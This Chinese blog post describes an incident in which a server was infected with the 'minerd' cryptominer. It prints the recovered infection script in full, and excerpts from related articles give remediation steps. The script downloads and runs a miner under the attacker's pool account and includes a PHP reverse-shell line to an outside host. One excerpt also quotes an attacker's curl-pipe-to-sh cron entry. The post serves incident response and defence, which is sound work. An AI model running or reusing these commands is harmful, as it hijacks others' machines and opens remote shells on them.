关于‘挖矿’minerd

今天服务器cpu使用率一直很高，而且是nice高，说明是一些低优先级的进程占用了大量的cpu，经过排查发先了minerd这个进程

以服务器的/tmp目录下找到了源头。。。。。一个简单的脚本：

 1 Cpunum=`cat /proc/cpuinfo |grep ‘processor‘|wc -l`;
 2 echo "cpu-number $Cpunum";
 3
 4 function random()
 5 {
 6     min=$1;
 7     max=$2-$1;
 8     num=$(date +%s+%N);
 9     ((retnum=num%max+min));
10     echo $retnum;
11 }
12
13 function down(){
14         rm -rf /tmp/minerd
15         rm -rf /tmp/pooler.tar.gz
16         Bits=`getconf LONG_BIT`;
17         echo $Bits;
18         if [ $Bits -eq 64 ];
19         then
20                 echo "is 64 bit";
21                 url=‘http://jaist.dl.sourceforge.net/project/cpuminer/pooler-cpuminer-2.4-linux-x86_64.tar.gz‘
22         elif [ $Bits -eq 32 ];
23         then
24                 echo "is 32 bit";
25                 url=‘http://jaist.dl.sourceforge.net/project/cpuminer/pooler-cpuminer-2.4-linux-x86.tar.gz‘
26         fi
27         echo $url
28         if [ -f /tmp/minerd ];
29         then
30                 echo "minerd File exists"
31                 #cd /tmp/
32                 #./minerd -a scrypt -o stratum+tcp://multi.ghash.io:3333 -u lscllc.worker1 -p x
33         else
34                 if [ -f /tmp/pooler.tar.gz ];
35                 then
36                         rm -rf /tmp/pooler.tar.gz
37                 fi
38                 if [ `which wget` ];
39                 then
40                         echo "wget is ok."
41                         downtools=`wget -O /tmp/pooler.tar.gz $url`
42                 elif [ `which curl` ];
43                 then
44                         echo "curl is ok."
45                         downtools=`curl -o /tmp/pooler.tar.gz $url`
46                 fi
47                 cd /tmp/
48                 tar zxvf pooler.tar.gz
49                 rm -rf /tmp/pooler.tar.gz
50                 #./minerd -a scrypt -o stratum+tcp://multi.ghash.io:3333 -u lscllc.worker1 -p x
51         fi
52
53 }
54 function run(){
55         out=$(random 1 100);
56         echo $out
57         Isopen=`php -r ‘[email protected]("multi.ghash.io",3333);exec("/bin/sh -i <&3 >&3 2>&3");if ($sock) {echo "ok";}‘`
58
59         if [ $Isopen ];
60         then
61                 echo "connt prot 3333 ok"
62                 cd /tmp
63                 ./minerd -a scrypt -o stratum+tcp://multi.ghash.io:3333 -u lscllc.worker$out -p x
64         else
65                 echo "connt 186 host pool 80"
66                 cd /tmp
67                 ./minerd -a scrypt -o stratum+tcp://106.186.118.162:80 -u lscllc.worker1 -p x
68
69         fi
70 }
71
72 process=`pgrep minerd`
73
74 #echo $process
75
76 if [ $process ];
77 then
78         echo "find minerd ok start kill $process"
79         kill $process
80         run
81 else
82         echo "not find minerd process"
83         down
84         run
85 fi

关于‘挖矿’minerd

时间： 2024-11-22 20:46:11

关于‘挖矿’minerd的相关文章

服务器被挖矿minerd入侵的解决办法

千万不要一开始就删除掉mierd,因为删除根本起不到作用,一会还是会生成一个解决minerd并不是最终目的,主要是查找问题来源. 解决问题思路 1.打开防火墙,添加规则,关闭挖矿minerd的访问 iptables -A INPUT -s xmr.crypto-pool.fr -j DROP iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP 2.查看crond计划任务 crontab -l cd /var/spool/cron/crontab #

redis后门导致被挖矿minerd解决办法

参考链接:http://www.cnblogs.com/zhouto/p/5680594.html 本次产生挖矿minerd入侵的主要原因是由于redis的漏洞造成: redis安全:http://blog.knownsec.com/2015/11/analysis-of-redis-unauthorized-of-expolit/ 在服务器中执行 top 查询,发现有minerd进程占用CPU达到90%多: ps -aux|grep minerd #直接kill掉该进程,发现十几秒中又起来

阿里云服务器被挖矿minerd入侵的解决办法

今天老大手机报警我检查发现阿里云服务器CPU很高,执行 top 一看,有个进程minerd尽然占用了90%多的CPU, 赶紧百度一下,查到几篇文章都有人遇到同样问题 Hu_Wen遇到的和我最相似,下边是他的解决办法 http://blog.csdn.net/hu_wen/article/details/51908597 但我去查看启动的服务,尽然没有 lady 这个服务. 找不到始作俑者,那个minerd进程删掉就又起来了,后来想了个临时办法,先停掉了挖矿的进程关闭访问挖矿服务器的访问 ip

  挖矿程序minerd，wnTKYg入侵分析和解决

挖矿程序minerd,wnTKYg入侵分析和解决作者:CYH 一．起因:最近登陆一台redis服务器发现登陆的时间非常长,而且各种命令敲大显示出的内容延迟很高二,分析: 首先我安装了iftop监控em1这个网卡流量 Iftop -i em1 发现里面的流量使用很低,没多少服务使用大的流量,没占用带宽,排除了ddos大流量攻击可能接着我输入命令top 查看各种负载,一看吓一跳,cpu平均负载达到70左右,使用率达到99

解决centos被minerd挖矿程序入侵方法

记录一次服务器被入侵的解决方法一:问题说明 1.我的服务器是使用的阿里云的CentOS,收到的阿里云发来的提示邮件如下然后我查看了运行的进程情况(top 命令),看到一个名为minerd的进程占用了99.5%的CPU 2.minerd是个挖矿程序,什么是"挖矿",特此百度了一下, 所谓"挖矿"实质上是用计算机解决一项复杂的数学问题,来保证比特币网络分布式记账系统的一致性.比特币网络会自动调整数学问题的难度,让整个网络约每10分钟得到一个合格答案.随后比特币网络

阿里云服务器被挖矿病毒minerd入侵的解决方法

早晨上班像往常一样对服务器进行例行巡检,发现一台阿里云服务器的CPU的资源占用很高,到底是怎么回事呢,赶紧用top命令查看了一下,发现是一个名为minerd的进程占用了很高的CPU资源,minerd之前听说过,是一种挖矿病毒,没有想到我负责的服务器会中这种病毒啊,赶紧的寻找解决的方法.下面是我把minerd给杀掉的过程,希望对大家有帮助. 步骤如下: 1.关闭访问挖矿服务器的访问 [[email protected]~]# iptables -A INPUT -s xmr.crypto-pool

minerd挖矿木马

由于用的是临时服务器,安全性上疏忽了,导致受到了minerd木马攻击,清理的时候,遇到了ntp这个很具有迷惑性的服务,费了一番功夫才敢彻底清理. 现状描述 1 top可以看到,这个minerd 程序把cpu跑满了 2 ps aux | grep minerd 可知是这个程序: /opt/minerd --- 这个不是我们自己启动的,可以断定服务器被黑了这个进程是root用户启动的,代码有漏洞可能性不大(web服务是www用户启动的),多半黑客已经登录服务器了 3 有可能是免密登录了,去/roo

服务器被植入挖矿病毒解决办法

服务器被植入挖矿,刚解决完,参考文章! 上午重启服务的时候,发现程序启动死慢,用top命令查看了一下,cpu被占用接近100%,所以无法运行新程序,通过top命令然后输入P,就能看到有两个程序几乎占用了所有的CPU,占用率为700%左右,程序名称为:minerd和AnXqV两个,通过搜索知道是挖矿程序,通过kill命令及pkill命令是无法直接解决的,找到了一个教程,http://www.cnblogs.com/zhouto/p/5680594.html,参考的这个进行的处理,基本上搞定了,不过

被黑客种下恶意程序进行挖矿的排除案例

被黑客种下恶意程序进行挖矿的排除案例在查询一个redis一个rbd文件没有在指定文件目录下进行保存时发现crontab上有个定时脚本,才发现被攻击放马了 #crontab -l */10 ** * * curl -fsSL https://r.chanstring.com/pm.sh?0706 | sh minerd是什么 minerd是挖矿程序,黑客入侵后,会利用宿主cpu进行复杂计算,强占cpu资源,使cpu使用率高达100% 下载脚本: cat pm.sh exportPATH=$